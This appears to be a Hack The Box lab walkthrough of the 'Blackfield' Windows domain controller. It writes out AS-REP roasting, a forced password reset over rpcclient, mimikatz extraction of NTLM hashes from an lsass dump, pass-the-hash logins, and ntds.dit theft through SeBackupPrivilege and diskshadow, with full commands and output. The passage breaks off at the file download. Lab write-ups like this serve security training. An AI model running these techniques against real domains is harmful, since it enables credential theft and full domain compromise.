Column |
Details |
Name |
Blackfield |
IP |
10.10.10.192 |
Points |
40 |
Os |
Windows |
Difficulty |
Hard |
Creator |
aas |
Out On |
06 June 2020 |
Brief@Blackfield:~$
Well
the journey starts from a smb share which has a lot of dirs
that turned out to be usernames . Generating TGT
for a valid user and cracking
it with john.Now i can login to rpcclient
the user has permissions to chnage another users’s password
, Thats what we need ,Chnaged the pass and Got access to another share which contain a .zip
file , Unzipping it we have a Memory Dump
file . Dumping it with mimikatz
gave us NTLM hash
of a user.Logged in using Evil-Winrm
. The user can backup
the files since it has rights to do it . Backup
the ntds.dit and getting the SYSTEM
file , Dumping the NTLM
hash from the files using secretdump
, Got ntlm hash of administrator
.
Summary
Anonymous
login to the share profiles$
- Creating a text file with the dirnames
- Generating a
TGT
for a valid user saving it in a file
- Cracking the hash with John
- Login to the
rpcclient
- Changing the audit2020 password to want i want.
Enumerating
the share forensic
- Got a zip file
lsass.zip
, Unzipping it
- Got a memory Dump file
lsass.DMP
- DUmping NTLM hash from the file using mimikatz
- Login as
svc_backup
- Got User.txt
- the user
svc_backup
can backup the files
- using diskshadow to create a new volume with alias of
c:
Copying
the ntds.dit
- Saving the registry file
SYSTEM
- Cracking the
NTLM
hash from the files using secretdump.py
- Login as
administrator
- Got root.txt
Pwned
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Recon
Nmap
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat allports.nmap
# Nmap 7.92 scan initiated Wed Sep 28 13:50:04 2022 as: nmap -Pn -sV -sC -T4 -p- -v -oN allports.nmap 10.10.10.192
Increasing send delay for 10.10.10.192 from 0 to 5 due to 55 out of 136 dropped probes since last increase.
Nmap scan report for blackfield.htb (10.10.10.192)
Host is up (0.090s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-28 18:58:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m29s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-09-28T18:58:40
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 28 13:58:46 2022 -- 1 IP address (1 host up) scanned in 522.15 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]
….the machine is about active-directory
the ports that are opened are saying that ….
enum4linux
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $enum4linux blackfield.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Sep 28 13:52:44 2022
==========================
| Target Information |
==========================
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on blackfield.htb |
======================================================
[E] Can't find workgroup/domain
==============================================
| Nbtstat Information for blackfield.htb |
==============================================
Looking up status of 10.10.10.192
No reply from 10.10.10.192
=======================================
| Session Check on blackfield.htb |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server blackfield.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
=============================================
| Getting domain SID for blackfield.htb |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)
.
Got the domain name BLACKFIELD
from the enum4linux
Smbclient
tried to login anonymously
, I enumerated for available shares and here is what i got.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $smbclient -L blackfield.htb
Enter WORKGROUP\puck's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
┌─[puck@parrot-lt]─[~/htb/blackfield]
Okay…so basically we have almost 2 shares
I tried to login myself to the share forensic
forensic share
1
2
3
4
5
6
|
➜ smbclient //blackfield.htb/forensic
Enter WORKGROUP\roots password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
|
But we are not allowed to enumerate
this share …move on
┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $sudo mount -t cifs -o username=anonymous,domain=blackfield.local //10.10.10.192/profiles$ /mnt/profiles
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls -1 /mnt/profiles/ > userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $
If we look closely at the every dir name , They are more than enough to understand that these are usernames
Let’s check which are valid users
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $/opt/kerbrute/kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.10.10.192 userlist.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/28/22 - Ronnie Flathers @ropnop
2022/09/28 14:26:02 > Using KDC(s):
2022/09/28 14:26:02 > 10.10.10.192:88
2022/09/28 14:26:08 > [+] VALID USERNAME: audit2020@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: support@blackfield.local
2022/09/28 14:26:18 > [+] VALID USERNAME: svc_backup@blackfield.local
2022/09/28 14:26:23 > Done! Tested 314 usernames (3 valid) in 20.819 seconds
┌─[puck@parrot-lt]─[~/htb/blackfield]
Using GetNPuser.py to get tgt
Now since we have users for the machine we can use GetNPuser
from the impacket
so we can generate a TGT for any valid user on the machine , I will generate the hash in john format so i can use john the ripper to crack the hash.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.LOCAL/ -usersfile validusers.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User audit2020@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup@blackfield.local doesn't have UF_DONT_REQUIRE_PREAUTH set
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $cat hashes.txt
$krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL:e51263a437b0eabadb88c806f5d899e0$4f2736792ae460f97724a3d56bb0fcdd81242deb1c7196297198832155cb33d944e191ff107af1b56684c9f5af1240ba0622a6aa966f8d1a17e2fa736720f2c1c9cb6cc2f9ed6087312d7536f6dc4c07fbe0c0c9e208cb578748fbe6d2e30d015e457c364e348f6638cadbb653d4e6ac93073b5ab335914e25b7bf30667a1054d1f8ac8be95825c2549a9ee5ad71f9c117b4265c9cbd05584f8b613d9e33298b31a7c2d4cdf8f1814f6c3110a3698b988cd505cb76e6927343c33f626974fd6c9134df56a615a5b83ac4750185c8a492ace85575f7ef3e7addb63cbc662b5cf36158e0c6c0ef2ec00ae0e063a8967a245d8ebad1
┌─[puck@parrot-lt]─[~/htb/blackfield]
Time to crack it with john
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $john hashes.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$support@blackfield.local@BLACKFIELD.LOCAL)
1g 0:00:00:14 DONE (2022-09-28 14:32) 0.06863g/s 983939p/s 983939c/s 983939C/s #1WIF3Y.."chito"
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $
and we we cracked it gently….
The creds are valid for SMB, not for WINRM
┌─[✗]─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
┌─[puck@parrot-lt]─[~/htb/blackfield]
.
Login into rpcclient
After enumerating here and there that where to use the credentials
, I logged in myself to rpcclient
Enumerating users
https://ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging
1
2
3
4
5
6
7
8
9
10
11
|
➜ blackfield rpcclient 10.10.10.192 -U support
Enter WORKGROUP\supports password:#00^BlackKnight
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
user:[admin1] rid:[0x13ed]
|
These are the avalilable users on the machine
Getting info about current user
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
rpcclient $> queryuser support
User Name : support
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Wed, 10 Jun 2020 16:41:38 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Sun, 23 Feb 2020 12:53:24 EST
Password can change Time : Mon, 24 Feb 2020 12:53:24 EST
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x450
group_rid: 0x201
acb_info : 0x00010210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x0000000b
padding1[0..7]...
logon_hrs[0..21]...
|
available privileges
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $>
|
These are some available privs that the current user have ….From the few of the above privs i concluded that the user can change the other user’s password
.
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
I tried almost all the available users and i got succeed on the user audit2020
to change its password…
rpcclient $> setuserinfo2 audit2020 23 'Geheim123!'
checked ldap, but nothing interesting found
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ldapsearch -h 10.10.10.192 -b "DC=BLACKFIELD,DC=local" -D 'support@blackfield.local' -w '#00^BlackKnight' > support_ldap_dump
┌─[puck@parrot-lt]─[~/htb/blackfield]
tried kerberoasting, but none found
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.192 'blackfield.local/support:#00^BlackKnight'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
No entries found!
┌─[puck@parrot-lt]─[~/htb/blackfield]
.
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 52 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 20S
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $ls
20220928150457_computers.json allports.nmap users.txt
20220928150457_domains.json hashes.txt validusers.txt
20220928150457_groups.json support_ldap_dump
20220928150457_users.json userlist.txt
┌─[puck@parrot-lt]─[~/htb/blackfield]
.
And now i can login myself to the smbclient
to enumerate the share forensic
….
1
2
3
4
5
6
7
8
9
10
11
12
|
smbclient //blackfield.htb/forensic -U audit2020
Enter WORKGROUP\audit2020s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
7846143 blocks of size 4096. 3523743 blocks available
smb: \>
|
Well…the user audit2020
has permissions to read the share
Got the file lsass.zip
After some manual enum
i got a .zip file called lsass.zip from the dir memory_analysis
, its was hard to find this file amongst so many files
1
2
3
4
5
|
smb: \memory_analysis\> get lsass.zip
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \memory_analysis\> getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now
➜ blackfield
|
But i got a NT_STATUS_IO_TIMEOUT
error when i was downloading the file …. Maybe the file size is too large
Mounting the share locally
i can also mount the share forensic
to my machine and i can enumerate the dirs like some regular ones.
mount using the mount utility from cifs.utility
1
2
3
|
➜ blackfield mount -t cifs //10.10.10.192/forensic /mnt -o user=audit2020
Password for audit2020@//10.10.10.192/forensic: **********
➜ blackfield
|
Now i can head towards the /mnt
dir for sure
1
2
3
|
➜ /mnt ls
commands_output memory_analysis tools
➜ /mnt
|
and now i can copy the zip file from here
1
|
➜ memory_analysis cp lsass.zip /home/prashant/
|
unzipping the file
1
2
3
4
|
➜ prashant unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
➜ prashant
|
Well .DMP
file is a memory dump file which been created when the program crahses or something went wrong….
It can be sometime useful to dump useful information
from it , Thats why mimikatz
has a feature to dump useful information from it like , NTLM hash
i copied the .DMP
file to my windows machine and Download mimikatz in it
Disable the virus-protection
from windows to download mimikatz
https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
https://github.com/gentilkiwi/mimikatz/releases
Load your mimikatz.exe
sekurlsa::minidump /users/0xPrashant/Desktop/lsass.DMP
sekurlsa::LogonPasswords
And done !! i got basically two users hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
Opening : '/users/0xPrashant/Desktop/lsass.DMP' file for minidump...
Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:30:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
msv :
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
tspkg :
wdigest :
* Username : svc_backup
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23-02-2020 23:29:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
tspkg :
wdigest :
* Username : Administrator
* Domain : BLACKFIELD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
* Password : (null)
ssp :
credman :
|
There is a administrator
NTLM hash but i dont think this will be that easy
1
2
3
4
5
6
7
8
9
10
11
|
➜ prashant evil-winrm -i 10.10.10.192 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
➜ prashant
|
As expected it didnt work….move on
Login as svc_backup
┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
┌─[puck@parrot-lt]─[~/htb/blackfield]
I tried the second NTLM
hash that is of svc_backup user
1
2
3
4
5
6
7
8
|
➜ prashant evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
|
Got user.txt
1
2
3
|
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
8ac------------------------------bd
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
|
Privilege escalation to root
Root is as simple as i didnt even think….
whoami /all
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
|
As from the output these are some interesting ones which suits to the username svc_backup
….
1
|
BUILTIN\Backup Operators
|
1
|
SeBackupPrivilege Back up files and directories Enabled
|
The user svc_backup
can backup the data since it has SeBackupPrivilege
it took me some time actually that what to do but some google searches save my time….
Since it is a AD
machine and i have perms to backup anyting from the machine , So i am going to backup the NTDS.dit
file and the registry file system
The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
Here is a good explation from a pdf file that how it is going to work !!
https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
i need to use diskshadow
to first make a new volume and alias
it with the volume C:
so i can read everything from the volume c:
here i made a text
file basically a script that will execute commands on the Diskshadow console
1
2
3
4
|
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias 0xprashant
create
expose %0xprashant% z:
|
Uploading the script
1
2
3
4
5
6
7
|
*Evil-WinRM* PS C:\temp> upload /home/prashant/0xprashant.txt
Info: Uploading /home/prashant/0xprashant.txt to C:\temp\0xprashant.txt
Data: 124 bytes of 124 bytes copied
Info: Upload successful!
|
Executing the script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/10/2020 3:34:37 PM
-> SET CONTEXT PERSISTENT NOWRITER
SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }
CLIENTACCESSIBLE Specify to create shadow copies usable by client versions of Windows.
PERSISTENT Specify that shadow copy is persist across program exit, reset or reboot.
PERSISTENT NOWRITERS Specify that shadow copy is persistent and all writers are excluded.
VOLATILE Specify that shadow copy will be deleted on exit or reset.
VOLATILE NOWRITERS Specify that shadow copy is volatile and all writers are excluded.
Example: SET CONTEXT CLIENTACCESSIBLE
|
Got an error of like this…..If i look at the error it is complaing about the -> SET CONTEXT PERSISTENT NOWRITER
but in my script it is NOWRITERS not NOWRITER
.
Then i figured it out that the last character from the line is being delted and then its used
I added an extra dummy character at the last of every line
1
2
3
4
5
|
➜ prashant cat 0xprashant.txt
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
|
like this……………!!!!!!
Running again
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/10/2020 3:41:15 PM
-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias 0xprashant
-> create
Alias 0xprashant for shadow ID {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9} set as environment variable.
Querying all shadow copies with the shadow copy set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9}
* Shadow copy ID = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} %0xprashant%
- Shadow copy set: {c38f96e5-6d7e-49f8-b605-25b0b25934e9} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/10/2020 3:41:17 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %0xprashant% z:
-> %0xprashant% = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}
The shadow copy was successfully exposed as z:\.
|
This time it ran smoothly
….
Now its ime to copy the NTDS.dit
file , There is a tool on github that will do this thing for me….
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
Upload the two dll files to the machine and then simply import
them
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/prashant/SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeUtils.dll
Info: Uploading /home/prashant/SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
|
Importing the scripts
1
2
|
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll
|
Copying the NTDS.dit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
*Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/10/2020 3:37 PM 98 0xprashant.txt
-a---- 6/10/2020 3:39 PM 636 2020-06-10_15-39-54_DC01.cab
-a---- 6/10/2020 3:41 PM 627 2020-06-10_15-41-18_DC01.cab
-a---- 6/10/2020 3:51 PM 18874368 ndts.dit
-a---- 6/10/2020 3:46 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 6/10/2020 3:48 PM 16384 SeBackupPrivilegeUtils.dll
|
And we got it …..now its time for the system
file
>*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system The operation completed successfully.
And download both the files….
1
|
